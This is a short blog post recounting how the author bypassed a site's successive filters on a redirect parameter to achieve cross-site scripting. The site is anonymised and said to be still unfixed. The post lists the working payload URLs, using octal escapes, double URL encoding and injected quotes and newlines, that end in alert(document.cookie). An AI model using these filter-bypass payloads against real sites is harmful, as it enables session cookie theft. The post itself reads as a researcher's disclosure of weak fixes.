Dealing with a XSS in a redirect

I've decided to write a little bit about a XSS vulnerability I came across on a website who will remain annonymous for the time being, as they haven't gotten around to fixing it yet. As the title might imply, the XSS was found in a document.location redirect. It started off as simple as:

http://side.tld/linkhandler.jsp?r=javascript:alert(0) - Nothing special about this.

What action did their admin take?
Filter out the word 'javascript'...

Seems they forgot to filter the backslash, so I replaced the ascii character 'a', with its octal equivalent.
http://side.tld/linkhandler.jsp?r=j\141vascript:alert(0)

What action did their admin take?
Escape the backslash with another backslash.

How about double URL encoding? Hrm, seems they missed that as well.
http://side.tld/linkhandler.jsp?r=j%2541vascript:alert(0)

What action did their admin take?
Escape %41 ...

Earlier in the day, I tested this which worked fine
http://side.tld/linkhandler.jsp?r=http://%2527%253B%0Aalert(document.cookie)%253B%2527

Later that same day, I tried again but it now required a valid URL, simply leaving it empty would yield an infinite loop.
http://side.tld/linkhandler.jsp?r=http://site.tld%2527%253B%0Aalert(document.cookie)%253B%2527

Which results in:

document.location = 'http://site.tld';
alert(document.cookie);'';

To this day, the vulnerability hasn't been fixed, I'm guessing they just gave up. Sometimes it is worth spending a little extra money to get the job done right, even if that means hiring a security specialist.

R.S.